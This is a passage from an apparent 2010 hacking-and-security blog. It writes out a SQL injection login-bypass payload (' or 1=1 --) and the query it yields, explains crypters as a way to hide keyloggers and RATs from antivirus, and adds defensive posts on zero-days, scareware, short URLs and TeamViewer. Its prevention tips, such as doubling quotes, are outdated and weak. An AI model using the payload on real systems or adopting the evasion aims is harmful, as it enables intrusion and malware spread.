The query now only checks for any user with a username "arpit" with empty password, or the conditional equation of 1=1. This means that if the password field is empty OR 1 equals 1 (which it does), then a valid row has been found in the users table. Last quote is commented out with a single-line comment delimiter (--). This stops returning an error about any unclosed quotations. Doing the same thing to the username field, like this:

Username: ' or 1=1 ---

Password: [Empty]

This would execute the following query against the users table:

SELECT userId FROM Users WHERE userName=' ' or 1=1 --' AND userPass='[Anything] '

Then we would also be logged in as a user that has the first entry in users table. For more information about SQL Injection visit http://www.unixwiz.net/techtips/sql-injection.html and search on google about it.

Preventing SQL Injection Attacks

If you design your scripts and applications with care, SQL injection attacks can be avoided most of the time. There are a number of things that we as developers can do to reduce our site's susceptibility to attack.

1. Replacing quotes : Majority of injection attacks require single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding.

2. Limit the Length of User Input

3. Remove Culprit Characters/Character Sequences

Crypters

2010-05-29T22:37:00.001-07:00

I have already written about Keyloggers in my previous articles. I have mentioned about antiviruses detecting keyloggers as Viruses and hence, hacker has to use Crypters to avoid antivirus detection for keyloggers.

What is Crypter?

Generally, antivirus work by splitting source code of application and then search for certain string within source code. If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system. A crypter is a program that allow users to crypt the source code of their program. Thus Crypter is free software used to hide viruses, keyloggers or any RAT tool from antiviruses so that they are not detected and deleted by antiviruses.

What does Crypter do?

Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.

What is FUD?

FUD: Fully UnDetectable. With increased use of Crypters to bypass antiviruses, Anti-Virus became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.

Zero Day Exploits

2010-05-27T18:22:00.001-07:00

After reading my blogs here, most of my friends ask me about zero day. So here it goes for all.....

A zero day exploit is when the exploit for the vulnerability is created before, or on the same day as the vulnerability is learned about by the vendor.
A zero-day exploit is when someone takes advantage of a security vulnerability on the same day that the vulnerability becomes generally known.

Once a person identifies that an application or program contains a potential security vulnerability, that person can notify the publisher of the application or program so that action can be taken to repair or patch the vulnerability or defend against its exploitation. The worst part of a zero day exploit is that some companies may not react fast enough to fix or patch the vulnerability. This will leave many users exposed and many might already be infected. The good news is that sometimes the hackers can’t expose or distribute the exploit faster than the fix. Hopefully this happens more often and suppresses any wrong doing from the hackers.

Hackers are getting smarter and are able to expose vulnerabilities much faster. In some cases, a hacker may be the first to discover the vulnerability. In these situations, the vulnerability and the exploit may become apparent on the same day. There is no way to guard against the exploit before it happens.

The best thing you can do to protect against zero-day exploits is to follow good security policies in the first place. By installing and keeping your anti-virus software up to date nd keeping your system patched against the vulnerabilities you are already aware of.

Rouge Security Programs

2010-05-26T17:06:00.000-07:00

Rogue security applications are also known as Scareware because they try to frighten users into thinking they need to buy a certain program. They looks like legitimate-anti-virus, anti-spyware and anti-malware products. These rogue applications appear beneficial from a security perspective but provide little or no protection, generate misleading alerts; essentially, they are malware, pretending to be genuine Internet security programs, and they aim to steal your money, private information etc.

How do Rogue Programs propagate?
Rogues are propagated in a variety of ways, using social engineering tactics to deceive and mislead people. For example:
1. You may see an ad for a security software product pop-up on your PC as your browsing the Web, warning you that your PC is infected with malware, prompting you to download a specific program to remove it.
2. You may see messages that appear to come from your operating system, telling you that your system is infected, and pushing you to take a certain action, like visit a website or download a program.

What do these programs do?
Rogue security software might report a virus, even though your computer is actually clean. The software might also fail to report viruses when your computer is infected. Inversely, sometimes, when you download rogue security software, it will install a virus or other malicious software on your computer so that the software has something to detect.

Update Yourself
There are many sites that have fragments of information about rogues or just aren’t updated regularly enough to be useful. In the Lavasoft Rogue Gallery (http://www.lavasoft.com/mylavasoft/rogues), you’ll find the names of every rogue seen, a screenshot of its user interface and additional information about it.

Be Careful With Short URL

2010-05-26T03:01:00.000-07:00

URL Shortners are websites that claim to make the url small so that you can have a customized url and don't need to send the long URL to anyone (e.g. "bit.ly", "tr.im" etc.). They are very popular with social networking sites such as twitter where there is a character limit to what you can post. The best thing about it is - its free !

URL shortening services work by redirection and this conceals the URL of the actual website you are landing on to. So, someone could send you a link that says "http://bit.ly/dtFGUq" and actually send you to "http://www.techpandit.in/". Security is a big concern here because you may get redirected to a website (hosted by the hacker) that hosts some browser exploit to download malware on your system or run some evil script on your browser before you know it.

"For every new invention, there is a equal and opposite invention". There is a website called "http://longurl.org/". It will expand and show you every small url that you type in. So, next time you receive such shortened links use this website and be sure that you are getting redirected to the correct website.

Remote Access to Any Computer From Anywhere

2010-05-20T04:25:00.001-07:00

TeamViewer is a simple and fast solution for remote control, desktop sharing and file transfer that works behind any firewall and NAT proxy. With TeamViewer you can remotely control any computer as if you were sitting right in front of it - even through firewalls. All your partner has to do is start a small application, which does not even require installation or administrative rights. To connect to desired computer just run TeamViewer on the desired computer (to whom you want to connect). With the first start teamviewer ID and Password are generated on the computer. Now make a account on http://www.teamviewer.com/ . If you already have account go to web login. After login it will ask you the teamviewer id and password of the computer to whom you want to connect. Fill these information and it will create a secure connection between your computer and desired computer. The software can also be used for presentations, where you can show your own desktop to a partner.

You can read about features of Teanviewer here http://www.teamviewer.com/products/benefits.aspx